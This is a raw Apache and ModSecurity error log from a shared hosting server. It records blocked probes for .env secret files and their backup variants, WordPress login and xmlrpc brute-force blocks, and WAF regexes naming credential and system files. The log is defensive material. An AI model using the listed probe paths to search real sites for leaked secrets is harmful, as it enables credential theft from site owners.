[Tue May 26 14:19:59.869693 2026] [security2:error] [pid 606909:tid 607052] [client 5.255.121.146:34276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVet10yRtX9qA7aVUVISQAAAJI"]
[Tue May 26 14:19:59.870716 2026] [security2:error] [pid 606909:tid 607160] [client 5.255.121.146:34262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.shahvishaal.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVet10yRtX9qA7aVUVISwAAAP4"]
[Tue May 26 14:19:59.880810 2026] [core:error] [pid 606909:tid 607049] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:19:59.880822 2026] [core:error] [pid 606909:tid 607049] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:20:00.294999 2026] [core:error] [pid 606909:tid 607099] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:20:00.295022 2026] [core:error] [pid 606909:tid 607099] [client 5.255.121.146:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:20:00.742723 2026] [security2:error] [pid 606909:tid 607107] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeuF0yRtX9qA7aVUVIXAAAAMk"]
[Tue May 26 14:20:01.809173 2026] [autoindex:error] [pid 606909:tid 607162] [client 36.5.145.86:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:20:02.398241 2026] [security2:error] [pid 606909:tid 606971] [remote 165.22.95.96:42232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVeul0yRtX9qA7aVUVIuwAAuj0"]
[Tue May 26 14:20:02.625699 2026] [security2:error] [pid 606909:tid 607139] [client 202.141.83.254:19935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVeul0yRtX9qA7aVUVIwwAAAOk"]
[Tue May 26 14:20:02.625832 2026] [security2:error] [pid 606909:tid 607139] [client 202.141.83.254:19935] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVeul0yRtX9qA7aVUVIwwAAAOk"]
[Tue May 26 14:20:02.662232 2026] [autoindex:error] [pid 606909:tid 607155] [client 36.5.145.86:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:20:02.827884 2026] [security2:error] [pid 606909:tid 607134] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeul0yRtX9qA7aVUVIvwAAAOQ"]
[Tue May 26 14:20:03.550191 2026] [autoindex:error] [pid 606909:tid 607063] [client 36.5.145.86:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:20:04.286387 2026] [security2:error] [pid 606909:tid 607094] [client 208.84.100.148:12540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahVevF0yRtX9qA7aVUVI9wAAALw"]
[Tue May 26 14:20:04.286850 2026] [security2:error] [pid 606909:tid 607146] [client 208.84.100.148:4834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahVevF0yRtX9qA7aVUVI-wAAAPA"]
[Tue May 26 14:20:04.287836 2026] [security2:error] [pid 606909:tid 607064] [client 208.84.100.148:4856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVevF0yRtX9qA7aVUVI-gAAAJ4"]
[Tue May 26 14:20:04.290754 2026] [security2:error] [pid 606909:tid 607102] [client 208.84.100.148:4842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVevF0yRtX9qA7aVUVJAQAAAMQ"]
[Tue May 26 14:20:04.783764 2026] [security2:error] [pid 606909:tid 607109] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVevF0yRtX9qA7aVUVJFgAAAMs"]
[Tue May 26 14:20:06.288935 2026] [security2:error] [pid 606909:tid 607145] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVevV0yRtX9qA7aVUVJOgAAAO8"]
[Tue May 26 14:20:08.538216 2026] [security2:error] [pid 606909:tid 607124] [client 208.84.100.148:4834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahVewF0yRtX9qA7aVUVJeAAAANo"]
[Tue May 26 14:20:09.033619 2026] [security2:error] [pid 606909:tid 607047] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVewF0yRtX9qA7aVUVJfgAAAI0"]
[Tue May 26 14:20:09.571913 2026] [security2:error] [pid 606909:tid 607161] [client 188.52.211.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVewV0yRtX9qA7aVUVJiQAAAP8"]
[Tue May 26 14:20:10.107583 2026] [security2:error] [pid 606909:tid 607127] [client 202.141.30.10:65413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVewl0yRtX9qA7aVUVJogAAAN0"]
[Tue May 26 14:20:10.107707 2026] [security2:error] [pid 606909:tid 607127] [client 202.141.30.10:65413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVewl0yRtX9qA7aVUVJogAAAN0"]
[Tue May 26 14:20:10.431593 2026] [security2:error] [pid 606909:tid 607153] [client 208.84.100.148:5328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahVewl0yRtX9qA7aVUVJqwAAAPc"]
[Tue May 26 14:20:10.431891 2026] [security2:error] [pid 606909:tid 607138] [client 208.84.100.148:5318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahVewl0yRtX9qA7aVUVJrAAAAOg"]
[Tue May 26 14:20:10.432154 2026] [security2:error] [pid 606909:tid 607142] [client 208.84.100.148:5304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahVewl0yRtX9qA7aVUVJrQAAAOw"]
[Tue May 26 14:20:10.433232 2026] [security2:error] [pid 606909:tid 607084] [client 208.84.100.148:5292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahVewl0yRtX9qA7aVUVJrgAAALI"]
[Tue May 26 14:20:10.435486 2026] [security2:error] [pid 606909:tid 607155] [client 208.84.100.148:5262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahVewl0yRtX9qA7aVUVJsQAAAPk"]
[Tue May 26 14:20:10.436581 2026] [security2:error] [pid 606909:tid 607050] [client 208.84.100.148:5264] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahVewl0yRtX9qA7aVUVJsAAAAJA"]
[Tue May 26 14:20:10.438272 2026] [security2:error] [pid 606909:tid 607115] [client 208.84.100.148:5224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahVewl0yRtX9qA7aVUVJswAAANE"]
[Tue May 26 14:20:10.438345 2026] [security2:error] [pid 606909:tid 607150] [client 208.84.100.148:5232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahVewl0yRtX9qA7aVUVJtAAAAPQ"]
[Tue May 26 14:20:10.438422 2026] [security2:error] [pid 606909:tid 607111] [client 208.84.100.148:5172] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahVewl0yRtX9qA7aVUVJtwAAAM0"]
[Tue May 26 14:20:10.438778 2026] [security2:error] [pid 606909:tid 607148] [client 208.84.100.148:5180] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahVewl0yRtX9qA7aVUVJtQAAAPI"]
[Tue May 26 14:20:10.439068 2026] [security2:error] [pid 606909:tid 607066] [client 208.84.100.148:5166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahVewl0yRtX9qA7aVUVJuAAAAKA"]
[Tue May 26 14:20:10.439575 2026] [security2:error] [pid 606909:tid 607050] [client 208.84.100.148:5146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahVewl0yRtX9qA7aVUVJuwAAAJA"]
[Tue May 26 14:20:10.439681 2026] [security2:error] [pid 606909:tid 607077] [client 208.84.100.148:5130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahVewl0yRtX9qA7aVUVJugAAAKs"]
[Tue May 26 14:20:10.439834 2026] [security2:error] [pid 606909:tid 607156] [client 208.84.100.148:5154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahVewl0yRtX9qA7aVUVJuQAAAPo"]
[Tue May 26 14:20:10.440183 2026] [security2:error] [pid 606909:tid 607110] [client 208.84.100.148:5246] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahVewl0yRtX9qA7aVUVJsgAAAMw"]
[Tue May 26 14:20:10.440727 2026] [security2:error] [pid 606909:tid 607056] [client 208.84.100.148:5198] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahVewl0yRtX9qA7aVUVJvAAAAJY"]
[Tue May 26 14:20:10.443269 2026] [security2:error] [pid 606909:tid 607048] [client 208.84.100.148:5104] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahVewl0yRtX9qA7aVUVJvgAAAI4"]
[Tue May 26 14:20:10.443415 2026] [security2:error] [pid 606909:tid 607054] [client 208.84.100.148:5074] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahVewl0yRtX9qA7aVUVJwAAAAJQ"]
[Tue May 26 14:20:10.444229 2026] [security2:error] [pid 606909:tid 607092] [client 208.84.100.148:5058] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahVewl0yRtX9qA7aVUVJwwAAALo"]
[Tue May 26 14:20:10.445026 2026] [security2:error] [pid 606909:tid 607070] [client 208.84.100.148:5090] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahVewl0yRtX9qA7aVUVJvQAAAKQ"]
[Tue May 26 14:20:10.503204 2026] [security2:error] [pid 606909:tid 607121] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVewl0yRtX9qA7aVUVJoQAAANc"]
[Tue May 26 14:20:12.733521 2026] [security2:error] [pid 606909:tid 607071] [client 68.183.88.172:59870] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "yourstorybag.com"] [uri "/"] [unique_id "ahVexF0yRtX9qA7aVUVKDwAAAKU"]
[Tue May 26 14:20:13.236017 2026] [security2:error] [pid 606909:tid 607062] [client 202.141.83.254:53972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVexV0yRtX9qA7aVUVKFgAAAJw"]
[Tue May 26 14:20:13.236130 2026] [security2:error] [pid 606909:tid 607062] [client 202.141.83.254:53972] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVexV0yRtX9qA7aVUVKFgAAAJw"]
[Tue May 26 14:20:13.456391 2026] [security2:error] [pid 606909:tid 607122] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVexV0yRtX9qA7aVUVKFQAAANg"]
[Tue May 26 14:20:14.227916 2026] [security2:error] [pid 606909:tid 607000] [remote 14.161.17.36:53760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVexl0yRtX9qA7aVUVKMgAArFo"]
[Tue May 26 14:20:15.679287 2026] [security2:error] [pid 606909:tid 607140] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVex10yRtX9qA7aVUVKaQAAAOo"]
[Tue May 26 14:20:15.721887 2026] [security2:error] [pid 606909:tid 606999] [remote 3.208.180.187:38712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.180.208.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVex10yRtX9qA7aVUVKcAAAmlk"]
[Tue May 26 14:20:17.299483 2026] [security2:error] [pid 606909:tid 607043] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeyF0yRtX9qA7aVUVKrAAAAIk"]
[Tue May 26 14:20:19.593226 2026] [security2:error] [pid 606909:tid 607089] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVey10yRtX9qA7aVUVK6AAAALc"]
[Tue May 26 14:20:21.002726 2026] [security2:error] [pid 606909:tid 607039] [client 202.141.30.10:65281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVezV0yRtX9qA7aVUVLGAAAAIU"]
